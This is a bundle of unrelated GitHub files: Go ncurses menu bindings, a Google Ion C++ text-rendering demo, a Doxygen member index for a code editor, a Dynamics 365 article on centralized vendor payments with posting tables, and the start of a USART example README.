return C.GoString(C.item_name((*C.ITEM)(item)))
}
func (menu *Menu) Mark() string {
return C.GoString(C.menu_mark((*C.MENU)(menu)))
}
func (menu *Menu) SetMark(mark string) bool {
return isOk(C.set_menu_mark((*C.MENU)(menu), C.CString(mark)))
}
func (menu *Menu) Pattern() string {
return C.GoString(C.menu_pattern((*C.MENU)(menu)))
}
func (menu *Menu) Back() Chtype {
return Chtype(C.menu_back((*C.MENU)(menu)))
}
func (menu *Menu) Fore() Chtype {
return Chtype(C.menu_fore((*C.MENU)(menu)))
}
func (menu *Menu) Grey() Chtype {
return Chtype(C.menu_grey((*C.MENU)(menu)))
}
func (item *Item) Free() bool {
return isOk(C.free_item((*C.ITEM)(item)))
}
func (menu *Menu) Free() bool {
return isOk(C.free_menu((*C.MENU)(menu)))
}
func (menu *Menu) ItemCount() int {
return int(C.item_count((*C.MENU)(menu)))
}
func (item *Item) Index() int {
return int(C.item_index((*C.ITEM)(item)))
}
func (item *Item) OptsOn(opt ItemOptions) bool {
return isOk(C.item_opts_on((*C.ITEM)(item), (C.Item_Options)(opt)))
}
func (item *Item) OptsOff(opt ItemOptions) bool {
return isOk(C.item_opts_off((*C.ITEM)(item), (C.Item_Options)(opt)))
}
func (menu *Menu) Drive(req int) bool {
return isOk(C.menu_driver((*C.MENU)(menu), C.int(req)))
}
func (menu *Menu) OptsOn(opt MenuOptions) bool {
return isOk(C.menu_opts_on((*C.MENU)(menu), (C.Menu_Options)(opt)))
}
func (menu *Menu) OptsOff(opt MenuOptions) bool {
return isOk(C.menu_opts_off((*C.MENU)(menu), (C.Menu_Options)(opt)))
}
func (menu *Menu) Pad() int {
return int(C.menu_pad((*C.MENU)(menu)))
}
func (menu *Menu) Post() bool {
return isOk(C.post_menu((*C.MENU)(menu)))
}
func (menu *Menu) Unpost() bool {
return isOk(C.unpost_menu((*C.MENU)(menu)))
}
func (menu *Menu) SetCurrentItem(item *Item) bool {
return isOk(C.set_current_item((*C.MENU)(menu), (*C.ITEM)(item)))
}
func (menu *Menu) SetWin(win *Window) bool {
return isOk(C.set_menu_win((*C.MENU)(menu), (*C.WINDOW)(unsafe.Pointer(win))))
}
func (menu *Menu) Win() *Window {
return (*Window)(unsafe.Pointer((C.menu_win((*C.MENU)(menu)))))
}
func (menu *Menu) SetSub(win *Window) bool {
return isOk(C.set_menu_sub((*C.MENU)(menu), (*C.WINDOW)(unsafe.Pointer(win))))
}
func (menu *Menu) Sub() *Window {
return (*Window)(unsafe.Pointer((C.menu_sub((*C.MENU)(menu)))))
}
func (item *Item) Value() bool {
return intToBool(C.item_value((*C.ITEM)(item)))
}
func (menu *Menu) Scale() (int, int, error) {
var (
rows C.int
cols C.int
)
if C.scale_menu((*C.MENU)(menu), &rows, &cols) != C.OK {
return 0, 0, MenusError{"Form.Scale failed"}
}
return int(rows), int(cols), nil
}
func (item *Item) Visible() bool {
return intToBool(C.item_visible((*C.ITEM)(item)))
}
func (menu *Menu) Format(rows int, cols int) {
cRows := C.int(rows)
cCols := C.int(cols)
C.menu_format((*C.MENU)(menu), &cRows, &cCols)
}
func (item *Item) SetUserPtr(ptr unsafe.Pointer) bool {
return isOk(C.set_item_userptr((*C.ITEM)(item), ptr))
}
func (item *Item) UserPtr() unsafe.Pointer {
return unsafe.Pointer(C.item_userptr((*C.ITEM)(item)))
}
| {
"pile_set_name": "Github"
} |
/**
Copyright 2017 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS-IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#include <memory>
#include <string>
#include "ion/gfx/node.h"
#include "ion/gfx/renderer.h"
#include "ion/gfx/shaderinputregistry.h"
#include "ion/gfx/shape.h"
#include "ion/gfx/statetable.h"
#include "ion/gfx/uniform.h"
#include "ion/gfxutils/shadermanager.h"
#include "ion/gfxutils/shapeutils.h"
#include "ion/math/matrix.h"
#include "ion/math/range.h"
#include "ion/math/transformutils.h"
#include "ion/math/vector.h"
#include "ion/text/fontimage.h"
#include "ion/text/freetypefont.h"
#include "ion/text/layout.h"
#include "ion/text/outlinebuilder.h"
#include "absl/memory/memory.h"
// This has to be included last or bad things happen on Windows.
#include "GL/freeglut.h"
namespace {
//-----------------------------------------------------------------------------
//
// Font data (public domain TTF) is stored as an array in a header file to
// avoid having to load a file on all platforms at run-time.
//
//-----------------------------------------------------------------------------
static unsigned char kFontData[] = {
#include "./fontdata.h"
};
//-----------------------------------------------------------------------------
//
// Global state to make this program easier.
//
//-----------------------------------------------------------------------------
struct GlobalState {
int window_width;
int window_height;
ion::gfx::NodePtr scene_root;
ion::gfx::RendererPtr renderer;
};
static std::unique_ptr<GlobalState> s_global_state;
//-----------------------------------------------------------------------------
//
// Scene graph construction.
//
//-----------------------------------------------------------------------------
static const ion::text::FontPtr CreateFont() {
static const char kFontName[] = "ExampleFont";
static const size_t kFontSizeInPixels = 64U;
static const size_t kSdfPadding = 8U;
ion::text::FontPtr font(new ion::text::FreeTypeFont(
kFontName, kFontSizeInPixels, kSdfPadding, kFontData, sizeof(kFontData)));
return font;
}
static const ion::gfx::NodePtr BuildTextNode(
const ion::text::FontImagePtr& font_image) {
ion::text::LayoutOptions options;
options.target_size.Set(0.f, 2.f);
options.horizontal_alignment = ion::text::kAlignHCenter;
options.vertical_alignment = ion::text::kAlignVCenter;
options.line_spacing = 1.5f;
const ion::text::Layout layout =
font_image->GetFont()->BuildLayout("Hello,\nWorld!", options);
ion::text::OutlineBuilderPtr outline_builder(new ion::text::OutlineBuilder(
font_image, ion::gfxutils::ShaderManagerPtr(),
ion::base::AllocatorPtr()));
outline_builder->Build(layout, ion::gfx::BufferObject::kStreamDraw);
outline_builder->SetTextColor(ion::math::Vector4f(1.f, 1.f, .4f, 1.f));
outline_builder->SetOutlineColor(ion::math::Vector4f(.1f, .1f, .1f, 1.f));
outline_builder->SetHalfSmoothWidth(2.f);
outline_builder->SetOutlineWidth(6.f);
return outline_builder->GetNode();
}
static const ion::gfx::NodePtr BuildScreenAlignedTextNode(
const ion::text::FontImagePtr& font_image) {
ion::text::LayoutOptions options;
options.target_point.Set(0.1f, 0.f);
options.target_size.Set(0.f, .06f);
options.horizontal_alignment = ion::text::kAlignLeft;
options.vertical_alignment = ion::text::kAlignBottom;
const ion::text::Layout layout =
font_image->GetFont()->BuildLayout("Screen-Aligned text", options);
ion::text::OutlineBuilderPtr outline_builder(new ion::text::OutlineBuilder(
font_image, ion::gfxutils::ShaderManagerPtr(),
ion::base::AllocatorPtr()));
outline_builder->Build(layout, ion::gfx::BufferObject::kStreamDraw);
outline_builder->SetTextColor(ion::math::Vector4f(1.f, .8f, .8f, 1.f));
outline_builder->SetOutlineColor(ion::math::Vector4f(.2f, .2f, .2f, 1.f));
outline_builder->SetHalfSmoothWidth(2.f);
outline_builder->SetOutlineWidth(6.f);
return outline_builder->GetNode();
}
static const ion::gfx::NodePtr BuildGraph(int window_width, int window_height) {
ion::gfx::NodePtr root(new ion::gfx::Node);
const ion::math::Vector2i window_size(window_width, window_height);
ion::gfx::StateTablePtr state_table(
new ion::gfx::StateTable(window_width, window_height));
state_table->SetViewport(
ion::math::Range2i::BuildWithSize(ion::math::Point2i(0, 0), window_size));
state_table->SetClearColor(ion::math::Vector4f(0.3f, 0.3f, 0.5f, 1.0f));
state_table->SetClearDepthValue(1.f);
state_table->Enable(ion::gfx::StateTable::kDepthTest, true);
state_table->Enable(ion::gfx::StateTable::kCullFace, true);
root->SetStateTable(state_table);
const ion::gfx::ShaderInputRegistryPtr& global_reg =
ion::gfx::ShaderInputRegistry::GetGlobalRegistry();
root->AddUniform(global_reg->Create<ion::gfx::Uniform>(
"uViewportSize", window_size));
ion::text::FontPtr font = CreateFont();
static const size_t kFontImageSize = 256U;
ion::text::DynamicFontImagePtr font_image(
new ion::text::DynamicFontImage(font, kFontImageSize));
ion::gfx::NodePtr text_node = BuildTextNode(font_image);
text_node->AddUniform(global_reg->Create<ion::gfx::Uniform>(
"uProjectionMatrix",
ion::math::PerspectiveMatrixFromView(ion::math::Anglef::FromDegrees(60.f),
1.f, .1f, 10.f)));
text_node->AddUniform(global_reg->Create<ion::gfx::Uniform>(
"uModelviewMatrix",
ion::math::LookAtMatrixFromCenter(ion::math::Point3f(2.f, 2.f, 4.f),
ion::math::Point3f::Zero(),
ion::math::Vector3f::AxisY())));
root->AddChild(text_node);
ion::gfx::NodePtr aligned_text_node = BuildScreenAlignedTextNode(font_image);
aligned_text_node->AddUniform(global_reg->Create<ion::gfx::Uniform>(
"uProjectionMatrix",
ion::math::OrthographicMatrixFromFrustum(0.f, 1.f, 0.f, 1.f, -1.f, 1.f)));
aligned_text_node->AddUniform(global_reg->Create<ion::gfx::Uniform>(
"uModelviewMatrix", ion::math::Matrix4f::Identity()));
root->AddChild(aligned_text_node);
return root;
}
//-----------------------------------------------------------------------------
//
// FreeGLUT callback functions.
//
//-----------------------------------------------------------------------------
static void Resize(int w, int h) {
s_global_state->window_width = w;
s_global_state->window_height = h;
glutPostRedisplay();
}
static void Render() {
if (s_global_state)
s_global_state->renderer->DrawScene(s_global_state->scene_root);
glutSwapBuffers();
}
static void Update() {
glutPostRedisplay();
}
static void Keyboard(unsigned char key, int x, int y) {
glutPostRedisplay();
}
static void KeyboardUp(unsigned char key, int x, int y) {
switch (key) {
case 27: // Escape.
s_global_state.reset(nullptr);
glutLeaveMainLoop();
break;
}
glutPostRedisplay();
}
} // anonymous namespace
//-----------------------------------------------------------------------------
//
// Mainline.
//
//-----------------------------------------------------------------------------
int main(int argc, char* argv[]) {
glutInit(&argc, argv);
s_global_state = absl::make_unique<GlobalState>();
s_global_state->window_width = s_global_state->window_height = 800;
s_global_state->scene_root = BuildGraph(s_global_state->window_width,
s_global_state->window_height);
glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH | GLUT_MULTISAMPLE);
glutSetOption(GLUT_MULTISAMPLE, 16);
glutInitWindowSize(s_global_state->window_width,
s_global_state->window_height);
glutCreateWindow("Ion rectangle example");
glutDisplayFunc(Render);
glutReshapeFunc(Resize);
glutKeyboardFunc(Keyboard);
glutKeyboardUpFunc(KeyboardUp);
glutIdleFunc(Update);
// Can't do this before GLUT creates the OpenGL context.
ion::gfx::GraphicsManagerPtr graphics_manager(new ion::gfx::GraphicsManager);
s_global_state->renderer.Reset(new ion::gfx::Renderer(graphics_manager));
glutMainLoop();
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.11"/>
<title>SourceWriter: Class Members - Functions</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="navtree.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="resize.js"></script>
<script type="text/javascript" src="navtreedata.js"></script>
<script type="text/javascript" src="navtree.js"></script>
<script type="text/javascript">
$(document).ready(initResizable);
$(window).load(resizeHeight);
</script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { init_search(); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectlogo"><img alt="Logo" src="icon_128x128.png"/></td>
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">SourceWriter
 <span id="projectnumber">01.00.00</span>
</div>
<div id="projectbrief">A simple, syntax highlighting code editor</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.11 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Packages</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="inherits.html"><span>Class Hierarchy</span></a></li>
<li class="current"><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<div id="navrow3" class="tabs2">
<ul class="tablist">
<li><a href="functions.html"><span>All</span></a></li>
<li class="current"><a href="functions_func.html"><span>Functions</span></a></li>
<li><a href="functions_vars.html"><span>Variables</span></a></li>
<li><a href="functions_enum.html"><span>Enumerations</span></a></li>
<li><a href="functions_prop.html"><span>Properties</span></a></li>
<li><a href="functions_evnt.html"><span>Events</span></a></li>
</ul>
</div>
<div id="navrow4" class="tabs3">
<ul class="tablist">
<li><a href="functions_func.html#index_a"><span>a</span></a></li>
<li><a href="functions_func_b.html#index_b"><span>b</span></a></li>
<li><a href="functions_func_c.html#index_c"><span>c</span></a></li>
<li><a href="functions_func_d.html#index_d"><span>d</span></a></li>
<li><a href="functions_func_e.html#index_e"><span>e</span></a></li>
<li><a href="functions_func_f.html#index_f"><span>f</span></a></li>
<li><a href="functions_func_g.html#index_g"><span>g</span></a></li>
<li><a href="functions_func_h.html#index_h"><span>h</span></a></li>
<li><a href="functions_func_i.html#index_i"><span>i</span></a></li>
<li><a href="functions_func_k.html#index_k"><span>k</span></a></li>
<li><a href="functions_func_l.html#index_l"><span>l</span></a></li>
<li class="current"><a href="functions_func_m.html#index_m"><span>m</span></a></li>
<li><a href="functions_func_n.html#index_n"><span>n</span></a></li>
<li><a href="functions_func_o.html#index_o"><span>o</span></a></li>
<li><a href="functions_func_p.html#index_p"><span>p</span></a></li>
<li><a href="functions_func_r.html#index_r"><span>r</span></a></li>
<li><a href="functions_func_s.html#index_s"><span>s</span></a></li>
<li><a href="functions_func_t.html#index_t"><span>t</span></a></li>
<li><a href="functions_func_u.html#index_u"><span>u</span></a></li>
<li><a href="functions_func_v.html#index_v"><span>v</span></a></li>
<li><a href="functions_func_w.html#index_w"><span>w</span></a></li>
<li><a href="functions_func_x.html#index_x"><span>x</span></a></li>
<li><a href="functions_func_z.html#index_z"><span>z</span></a></li>
</ul>
</div>
</div><!-- top -->
<div id="side-nav" class="ui-resizable side-nav-resizable">
<div id="nav-tree">
<div id="nav-tree-contents">
<div id="nav-sync" class="sync"></div>
</div>
</div>
<div id="splitbar" style="-moz-user-select:none;"
class="ui-resizable-handle">
</div>
</div>
<script type="text/javascript">
$(document).ready(function(){initNavTree('functions_func_m.html','');});
</script>
<div id="doc-content">
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div class="contents">
 
<h3><a class="anchor" id="index_m"></a>- m -</h3><ul>
<li>Main()
: <a class="el" href="class_source_writer_1_1_main_class.html#a33b8365e5246df4be685519019834bb7">SourceWriter.MainClass</a>
</li>
<li>ManualToolbarItem()
: <a class="el" href="class_app_kit_1_1_manual_toolbar_item.html#a8671abaca578f1c04204ecbad044cb8b">AppKit.ManualToolbarItem</a>
</li>
<li>Markdown()
: <a class="el" href="class_markdown_sharp_1_1_markdown.html#a79c6bf2c4157c82953866862e32ba86b">MarkdownSharp.Markdown</a>
</li>
<li>MarkDownDescriptor()
: <a class="el" href="class_app_kit_1_1_text_kit_1_1_formatter_1_1_mark_down_descriptor.html#a0e58bf2fe3ed90d0a300814514dbf7f5">AppKit.TextKit.Formatter.MarkDownDescriptor</a>
</li>
<li>MatchesCharacter()
: <a class="el" href="class_app_kit_1_1_text_kit_1_1_formatter_1_1_format_descriptor.html#a9241c317e43ad031ac53c2463177c7a7">AppKit.TextKit.Formatter.FormatDescriptor</a>
</li>
</ul>
</div><!-- contents -->
</div><!-- doc-content -->
<!-- start footer part -->
<div id="nav-path" class="navpath"><!-- id is needed for treeview function! -->
<ul>
<li class="footer">Generated on Thu Feb 18 2016 10:34:52 for SourceWriter by
<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.11 </li>
</ul>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
---
# required metadata
title: Centralized payments for Accounts payable
description: Organizations that include multiple legal entities can create and manage payments by using a single legal entity that handles all payments. Therefore, the same payments don't have to be entered in multiple legal entities. This article provides examples that show how posting for centralized payments is handled in various scenarios.
author: abruer
manager: AnnBe
ms.date: 02/12/2017
ms.topic: article
ms.prod:
ms.service: dynamics-ax-applications
ms.technology:
# optional metadata
ms.search.form: LedgerJournalTransVendPaym, VendOpenTrans
# ROBOTS:
audience: Application User
# ms.devlang:
ms.reviewer: roschlom
ms.search.scope: Core, Operations
# ms.tgt_pltfrm:
ms.custom: 14341
ms.assetid: 7bd02e32-2416-4ac6-8a60-85525267fdb7
ms.search.region: Global
# ms.search.industry:
ms.author: shpandey
ms.search.validFrom: 2016-02-28
ms.dyn365.ops.version: AX 7.0.0
---
# Centralized payments for Accounts payable
[!include [banner](../includes/banner.md)]
Organizations that include multiple legal entities can create and manage payments by using a single legal entity that handles all payments. Therefore, the same payments don't have to be entered in multiple legal entities. This article provides examples that show how posting for centralized payments is handled in various scenarios.
Organizations that include multiple legal entities can create and manage payments by using a legal entity that handles all payments. Therefore, the same payments don't have to be entered in multiple legal entities. Additionally, the organization saves time, because the payment process is streamlined.
In a centralized payments organization, there are many legal entities for operations, and each operating legal entity manages its own vendor invoices. Payments for all the operating legal entities are generated from a single legal entity, which is known as the legal entity of the payment. During the settlement process, the applicable due-to and due-from transactions are generated. You can specify which legal entity in the organization receives the realized gain or realized loss transactions, and how cash discount transactions that are related to a cross-company payment are handled. On the centralized payment journal line, the **Account type** should be set to Vendor. The **Offset account typ**e should be set to Bank or Ledger. The bank account should be in the current company.
The following examples illustrate how posting is handled in various scenarios. The following configuration is assumed for all these examples:
- The legal entities are Fabrikam, Fabrikam East, and Fabrikam West. Payments are made from Fabrikam.
- The **Post cash discount** field on the **Intercompany accounting** page is set to **Legal entity of the invoice**.
- The **Post currency exchange gain or loss** field on the **Intercompany accounting** page is set to **Legal entity of the payment**.
- The vendor Fourth Coffee is set up as a vendor in each legal entity. The vendors from the various legal entities are identified as the same vendor because they share the same global address book ID.
| Directory ID | Vendor account | Name | Legal entity |
|--------------|----------------|---------------|---------------|
| 1050 | 3004 | Fourth Coffee | Fabrikam |
| 1050 | 100 | Fourth Coffee | Fabrikam East |
| 1050 | 3004 | Fourth Coffee | Fabrikam West |
## Example 1: Vendor payment of invoice from another legal entity
Fabrikam East has an open invoice for vendor account 100, Fourth Coffee. Fabrikam enters and posts a payment to Fabrikam vendor account 3004, Fourth Coffee. The payment is settled with the open invoice.
### Invoice is posted in Fabrikam East for vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Expense (Fabrikam East) | 600.00 | |
| Accounts payable (Fabrikam East) | | 600.00 |
### Payment is generated and posted in Fabrikam for vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|--------------|---------------|
| Accounts payable (Fabrikam) | 600.00 | |
| Cash (Fabrikam) | | 600.00 |
### Fabrikam payment is settled with Fabrikam East invoice
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|--------------|---------------|
| Due from Fabrikam East (Fabrikam) | 600.00 | |
| Accounts payable (Fabrikam) | | 600.00 |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam East) | 600.00 | |
| Due to Fabrikam (Fabrikam East) | | 600.00 |
## Example 2: Vendor payment of invoice from another legal entity with cash discount
Fabrikam East has an open invoice for vendor 100, Fourth Coffee. The invoice has a 20.00 cash discount available. Fabrikam enters and posts a payment of 580.00 for Fabrikam vendor 3004, Fourth Coffee. The payment is settled with the open Fabrikam East invoices. The cash discount is posted to the legal entity of the invoice, Fabrikam East.
### Invoice is posted in Fabrikam East for Fabrikam East vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Expense (Fabrikam East) | 600.00 | |
| Accounts payable (Fabrikam East) | | 600.00 |
### Payment is generated and posted in Fabrikam for Fabrikam vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|--------------|---------------|
| Accounts payable (Fabrikam) | 580.00 | |
| Cash (Fabrikam) | | 580.00 |
### Fabrikam payment is settled with Fabrikam East invoice
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|--------------|---------------|
| Due from Fabrikam East (Fabrikam) | 580.00 | |
| Accounts payable (Fabrikam) | | 580.00 |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam East) | 580.00 | |
| Due to Fabrikam (Fabrikam East) | | 580.00 |
| Accounts payable (Fabrikam East) | 20.00 | |
| Cash discount (Fabrikam East) | | 20.00 |
## Example 3: Vendor payment of invoice from another legal entity with realized exchange rate loss
Fabrikam East has an open invoice for vendor 100, Fourth Coffee. Fabrikam enters and posts a payment for Fabrikam vendor 3004, Fourth Coffee. The payment is settled with the open Fabrikam East invoice. A currency exchange loss transaction is generated during the settlement process.
- Exchange rate for euros (EUR) to U.S. dollars (USD) as of the invoice date: 1.2062
- Exchange rate for EUR to USD as of the payment date: 1.2277
### Invoice is posted in Fabrikam East for Fabrikam East vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|-------------------------|-------------------------|
| Expense (Fabrikam East) | 600.00 EUR / 723.72 USD | |
| Accounts payable (Fabrikam East) | | 600.00 EUR / 723.72 USD |
### Payment is generated and posted in Fabrikam for Fabrikam vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|-------------------------|-------------------------|
| Accounts payable (Fabrikam) | 600.00 EUR / 736.62 USD | |
| Cash (Fabrikam) | | 600.00 EUR / 736.62 USD |
### Fabrikam payment is settled with Fabrikam East invoice
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|-------------------------|-------------------------|
| Due from Fabrikam East (Fabrikam) | 600.00 EUR / 736.62 USD | |
| Accounts payable (Fabrikam) | | 600.00 EUR / 736.62 USD |
| Realized loss (Fabrikam) | 0.00 EUR / 12.90 USD | |
| Due from Fabrikam East (Fabrikam) | | 0.00 EUR / 12.90 USD |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|----------------------------------|-------------------------|-------------------------|
| Accounts payable (Fabrikam East) | 600.00 EUR / 736.62 USD | |
| Due to Fabrikam (Fabrikam East) | | 600.00 EUR / 736.62 USD |
| Due to Fabrikam (Fabrikam East) | 0.00 EUR / 12.90 USD | |
| Accounts payable (Fabrikam East) | | 0.00 EUR / 12.90 USD |
## Example 4: Vendor payment of invoice from another legal entity with cash discount and realized exchange rate loss
Fabrikam East has an open invoice for vendor 100, Fourth Coffee. The invoice has a cash discount available, and a sales tax transaction is generated. Fabrikam posts a payment for Fabrikam vendor 3004, Fourth Coffee. The payment is settled with the open Fabrikam East invoice. A currency exchange loss transaction is generated during the settlement process. The cash discount is posted to the legal entity of the invoice (Fabrikam East), and the currency exchange loss is posted to the legal entity of the payment (Fabrikam).
- Exchange rate for EUR to USD as of the invoice date: 1.2062
- Exchange rate for EUR to USD as of the payment date: 1.2277
### Invoice is posted and a tax transaction is generated in Fabrikam East for vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|-------------------------|-------------------------|
| Expense (Fabrikam East) | 564.07 EUR / 680.38 USD | |
| Sales tax (Fabrikam East) | 35.93 EUR / 43.34 USD | |
| Accounts payable (Fabrikam East) | | 600.00 EUR / 723.72 USD |
### Payment is generated and posted in Fabrikam for vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|-------------------------|-------------------------|
| Accounts payable (Fabrikam) | 588.72 EUR / 722.77 USD | |
| Cash (Fabrikam East) | | 588.72 EUR / 722.77 USD |
### Fabrikam payment is settled with Fabrikam East invoice
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|-------------------------|-------------------------|
| Due from Fabrikam East (Fabrikam) | 588.72 EUR / 722.77 USD | |
| Accounts payable (Fabrikam) | | 588.72 EUR / 722.77 USD |
| Realized loss (Fabrikam) | 0.00 EUR / 12.66 USD | |
| Due from Fabrikam East (Fabrikam) | | 0.00 EUR / 12.66 USD |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|----------------------------------|-------------------------|-------------------------|
| Accounts payable (Fabrikam East) | 588.72 EUR / 722.77 USD | |
| Due to Fabrikam (Fabrikam East) | | 588.72 EUR / 722.77 USD |
| Due to Fabrikam (Fabrikam East | 0.00 EUR / 12.66 USD | |
| Accounts payable (Fabrikam East) | | 0.00 EUR / 12.66 USD |
| Accounts payable (Fabrikam East) | 11.28 EUR / 13.61 USD | |
| Cash discount (Fabrikam East) | | 11.28 EUR / 13.61 USD |
## Example 5: Vendor credit note with primary payment
Fabrikam generates a payment of 75.00 for vendor 3004, Fourth Coffee. The payment is settled with an open invoice for Fabrikam West vendor 3004 and an open credit note for Fabrikam East vendor 100. The payment is selected as the primary payment on the **Settle transactions** page.
### Invoice is posted to Fabrikam West for vendor 3004
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Expense (Fabrikam West) | 100.00 | |
| Accounts payable (Fabrikam West) | | 100.00 |
### Credit note is posted to Fabrikam East for vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam East) | 25.00 | |
| Purchase returns (Fabrikam East) | | 25.00 |
### Payment is posted to Fabrikam for vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|--------------|---------------|
| Accounts payable (Fabrikam) | 75.00 | |
| Cash (Fabrikam) | | 75.00 |
### Fabrikam payment is settled with Fabrikam West invoice and Fabrikam East credit note
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam) | 25.00 | |
| Due to Fabrikam East (Fabrikam) | | 25.00 |
| Due from Fabrikam West (Fabrikam) | 100.00 | |
| Accounts payable (Fabrikam) | | 100.00 |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|--------------|---------------|
| Due from Fabrikam (Fabrikam East) | 25.00 | |
| Accounts payable (Fabrikam East) | | 25.00 |
**Fabrikam West posting**
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam West) | 100.00 | |
| Due to Fabrikam (Fabrikam West) | | 100.00 |
## Example 6: Vendor credit note without primary payment
Fabrikam generates a payment of 75.00 for vendor 3004, Fourth Coffee. The payment is settled with an open invoice for Fabrikam West vendor 3004 and an open credit note for Fabrikam East vendor 100. The payment isn't selected as the primary payment on the **Settle transactions** page.
### Invoice is posted to Fabrikam West for vendor 3004
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Expense (Fabrikam West) | 100.00 | |
| Accounts payable (Fabrikam West) | | 100.00 |
### Credit note is posted to Fabrikam East for vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam East) | 25.00 | |
| Purchase returns (Fabrikam East) | | 25.00 |
### Payment is posted to Fabrikam for vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|--------------|---------------|
| Accounts payable (Fabrikam) | 75.00 | |
| Cash (Fabrikam) | | 75.00 |
### Fabrikam payment is settled with Fabrikam West invoice and Fabrikam East credit note
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|--------------|---------------|
| Due from Fabrikam West (Fabrikam) | 75.00 | |
| Accounts payable (Fabrikam) | | 75.00 |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|----------------------------------------|--------------|---------------|
| Due from Fabrikam West (Fabrikam East) | 25.00 | |
| Accounts payable (Fabrikam East) | | 25.00 |
**Fabrikam West posting**
| Account | Debit amount | Credit amount |
|--------------------------------------|--------------|---------------|
| Accounts payable (Fabrikam West) | 75.00 | |
| Due to Fabrikam (Fabrikam West) | | 75.00 |
| Accounts payable (Fabrikam West) | 25.00 | |
| Due to Fabrikam East (Fabrikam West) | | 25.00 |
| {
"pile_set_name": "Github"
} |
Simple USART Example
--------------------
This example sets up a USART port and provides a few simple
character handling functions to that a short interactive program
